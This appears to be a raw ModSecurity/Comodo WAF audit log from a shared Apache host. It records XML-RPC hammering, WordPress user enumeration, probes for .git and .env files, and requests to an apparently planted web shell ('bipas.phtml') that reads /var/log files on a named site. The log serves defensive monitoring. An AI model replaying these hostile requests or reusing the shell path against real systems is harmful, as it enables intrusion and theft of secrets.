gzip,deflate --5aa4de62-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2950 Connection: close Content-Type: text/html; charset=UTF-8 --5aa4de62-H-- Message: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /var/log/auth.log.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6iNDr2XEdSo0rTaLVpCQAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749983796157437 4136 (- - -) Stopwatch2: 1749983796157437 4136; combined=2293, p1=333, p2=1829, p3=38, p4=35, p5=58, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5aa4de62-Z-- --95f08d5a-A-- [15/Jun/2025:16:06:36.321010 +0530] aE6iNOvhFIArpJWr_ioQGQAAAAU 196.251.85.177 60596 127.0.0.1 7081 --95f08d5a-B-- POST //xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 196.251.85.177 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Content-Type: application/xml --95f08d5a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --95f08d5a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 196.251.85.177 (115+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 196.251.85.177 (115+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE6iNOvhFIArpJWr_ioQGQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749983796039288 281778 (- - -) Stopwatch2: 1749983796039288 281778; combined=2290, p1=436, p2=1486, p3=53, p4=57, p5=161, sr=171, sw=97, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --95f08d5a-Z-- --c97f7007-A-- [15/Jun/2025:16:07:36.640299 +0530] aE6icDS8xKUOR1xBR5bjFAAAAAM 196.251.85.177 38410 127.0.0.1 7081 --c97f7007-B-- POST //xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 196.251.85.177 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Content-Type: application/xml --c97f7007-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --c97f7007-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 196.251.85.177 (112+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 196.251.85.177 (112+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE6icDS8xKUOR1xBR5bjFAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749983856358055 282300 (- - -) Stopwatch2: 1749983856358055 282300; combined=1690, p1=282, p2=1034, p3=63, p4=54, p5=161, sr=82, sw=96, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c97f7007-Z-- --41d30d69-A-- [15/Jun/2025:16:08:33.793659 +0530] aE6iqDS8xKUOR1xBR5bjQAAAAAM 47.90.159.146 53338 127.0.0.1 7081 --41d30d69-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: best-website-designs.com X-Real-IP: 47.90.159.146 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9 --41d30d69-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://best-website-designs.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 2 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --41d30d69-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "best-website-designs.com"] [uri "/wp-json/wp/v2/users"] [unique_id "aE6iqDS8xKUOR1xBR5bjQAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749983912720273 1073466 (- - -) Stopwatch2: 1749983912720273 1073466; combined=2364, p1=458, p2=1814, p3=0, p4=0, p5=91, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --41d30d69-Z-- --e4267d5a-A-- [15/Jun/2025:16:08:36.527423 +0530] aE6irGah4jZQMChzmsZ7EQAAAAI 196.251.85.177 53742 127.0.0.1 7081 --e4267d5a-B-- POST //xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 196.251.85.177 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Content-Type: application/xml --e4267d5a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --e4267d5a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 196.251.85.177 (111+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 196.251.85.177 (111+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE6irGah4jZQMChzmsZ7EQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749983916237382 290096 (- - -) Stopwatch2: 1749983916237382 290096; combined=2339, p1=361, p2=1551, p3=61, p4=60, p5=187, sr=100, sw=119, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e4267d5a-Z-- --a277bb24-A-- [15/Jun/2025:16:09:36.685353 +0530] aE6i6Gah4jZQMChzmsZ7MwAAAAI 196.251.85.177 36298 127.0.0.1 7081 --a277bb24-B-- POST //xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 196.251.85.177 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Content-Type: application/xml --a277bb24-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a277bb24-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 196.251.85.177 (115+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 196.251.85.177 (115+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE6i6Gah4jZQMChzmsZ7MwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749983976405687 279723 (- - -) Stopwatch2: 1749983976405687 279723; combined=2252, p1=397, p2=1480, p3=51, p4=51, p5=176, sr=107, sw=97, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a277bb24-Z-- --e0541767-A-- [15/Jun/2025:16:10:36.770786 +0530] aE6jJA9BijgXpeeI_r-5hwAAAAE 196.251.85.177 59220 127.0.0.1 7081 --e0541767-B-- POST //xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 196.251.85.177 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 486 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Content-Type: application/xml --e0541767-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --e0541767-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 196.251.85.177 (120+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 196.251.85.177 (120+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE6jJA9BijgXpeeI_r-5hwAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749984036477232 293612 (- - -) Stopwatch2: 1749984036477232 293612; combined=2420, p1=385, p2=1660, p3=51, p4=52, p5=172, sr=111, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e0541767-Z-- --1d6a533f-A-- [15/Jun/2025:16:12:33.768578 +0530] aE6jmcZRGs9Zs5Qd_koZUQAAAAA 172.71.222.82 51370 127.0.0.1 7081 --1d6a533f-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.71.222.82 X-Forwarded-For: 172.190.142.176 Connection: close cf-ray: 9501761f2edc2421-IAD cdn-loop: cloudflare; loops=1 accept-encoding: gzip, br x-forwarded-proto: https cf-ipcountry: US cf-connecting-ip: 172.190.142.176 cf-visitor: {"scheme":"https"} cookie: wordpress_test_cookie=WP%20Cookie%20check --1d6a533f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13867 Connection: close Content-Type: text/html; charset=UTF-8 --1d6a533f-H-- Message: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "www.getcalley.com"] [uri "/images/stories/admin-post.php"] [unique_id "aE6jmcZRGs9Zs5Qd_koZUQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749984153488069 280593 (- - -) Stopwatch2: 1749984153488069 280593; combined=2471, p1=439, p2=1930, p3=0, p4=0, p5=101, sr=157, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1d6a533f-Z-- --b42dc43c-A-- [15/Jun/2025:16:18:51.465175 +0530] aE6lE-vhFIArpJWr_ioRfAAAAAU 185.177.72.204 55436 127.0.0.1 7080 --b42dc43c-B-- GET /.git/HEAD HTTP/1.0 Host: zen-noether.198-71-51-75.plesk.page X-Real-IP: 185.177.72.204 Connection: close Accept-Encoding: gzip --b42dc43c-F-- HTTP/1.1 404 Not Found Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 --b42dc43c-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "zen-noether.198-71-51-75.plesk.page"] [uri "/.git/HEAD"] [unique_id "aE6lE-vhFIArpJWr_ioRfAAAAAU"] Stopwatch: 1749984531462148 3068 (- - -) Stopwatch2: 1749984531462148 3068; combined=1864, p1=383, p2=1385, p3=19, p4=26, p5=51, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b42dc43c-Z-- --50295f3e-A-- [15/Jun/2025:16:19:28.604459 +0530] aE6lODr2XEdSo0rTaLVqhwAAAAg 3.94.40.182 58382 127.0.0.1 7081 --50295f3e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/maillog HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.94.40.182 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --50295f3e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2944 Connection: close Content-Type: text/html; charset=UTF-8 --50295f3e-H-- Message: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6lODr2XEdSo0rTaLVqhwAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749984568600625 3886 (- - -) Stopwatch2: 1749984568600625 3886; combined=2080, p1=345, p2=1594, p3=37, p4=24, p5=80, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --50295f3e-Z-- --9938ab54-A-- [15/Jun/2025:16:19:47.754442 +0530] aE6lS1irsA1ruSKrNWSP-gAAAAQ 44.194.139.149 54692 127.0.0.1 7081 --9938ab54-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/kern.log.4.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.194.139.149 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --9938ab54-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2949 Connection: close Content-Type: text/html; charset=UTF-8 --9938ab54-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6lS1irsA1ruSKrNWSP-gAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1749984587750678 3815 (- - -) Stopwatch2: 1749984587750678 3815; combined=2026, p1=331, p2=1569, p3=37, p4=34, p5=54, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9938ab54-Z-- --0d8a4352-A-- [15/Jun/2025:16:21:20.740372 +0530] aE6lp1irsA1ruSKrNWSQIAAAAAQ 47.129.30.77 52050 127.0.0.1 7081 --0d8a4352-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 47.129.30.77 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --0d8a4352-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin,Accept-Encoding Connection: close Content-Type: application/json; charset=UTF-8 --0d8a4352-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.tandonamit.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.tandonamit.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.tandonamit.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE6lp1irsA1ruSKrNWSQIAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749984679215730 1524753 (- - -) Stopwatch2: 1749984679215730 1524753; combined=1932, p1=331, p2=1489, p3=0, p4=0, p5=111, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0d8a4352-Z-- --2571e61c-A-- [15/Jun/2025:16:27:53.743519 +0530] aE6nMA9BijgXpeeI_r-7FwAAAAE 52.138.216.93 45326 127.0.0.1 7081 --2571e61c-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: www.futuronomics.com X-Real-IP: 52.138.216.93 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wpr_guest_token=555bd2c7fe454aff8601c680ea8ca442f8fe2c592ba2875204d6671913a16757; wordpress_test_cookie=WP%20Cookie%20check --2571e61c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.futuronomics.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 --2571e61c-H-- Message: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.futuronomics.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.futuronomics.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "www.futuronomics.com"] [uri "/images/stories/admin-post.php"] [unique_id "aE6nMA9BijgXpeeI_r-7FwAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/futuronomics.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749985072116099 1627487 (- - -) Stopwatch2: 1749985072116099 1627487; combined=2447, p1=341, p2=2019, p3=0, p4=0, p5=87, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2571e61c-Z-- --e7a51834-A-- [15/Jun/2025:16:38:00.112004 +0530] aE6pkBRnvL96XFagPFC1VwAAAAY 185.177.72.144 55670 127.0.0.1 7081 --e7a51834-B-- GET /.env HTTP/1.0 Host: www.arrayz.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e7a51834-F-- HTTP/1.1 404 Not Found Last-Modified: Mon, 30 Sep 2024 04:07:46 GMT ETag: "328-6234e58ee1deb" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e7a51834-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.arrayz.com"] [uri "/.env"] [unique_id "aE6pkBRnvL96XFagPFC1VwAAAAY"] Stopwatch: 1749985680108860 3198 (- - -) Stopwatch2: 1749985680108860 3198; combined=1877, p1=424, p2=1398, p3=0, p4=0, p5=55, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e7a51834-Z-- --8e258749-A-- [15/Jun/2025:16:38:00.230046 +0530] aE6pkB_rKu9vEuWYHiZeygAAAAk 185.177.72.144 55698 127.0.0.1 7081 --8e258749-B-- GET /.env.bak HTTP/1.0 Host: www.arrayz.com 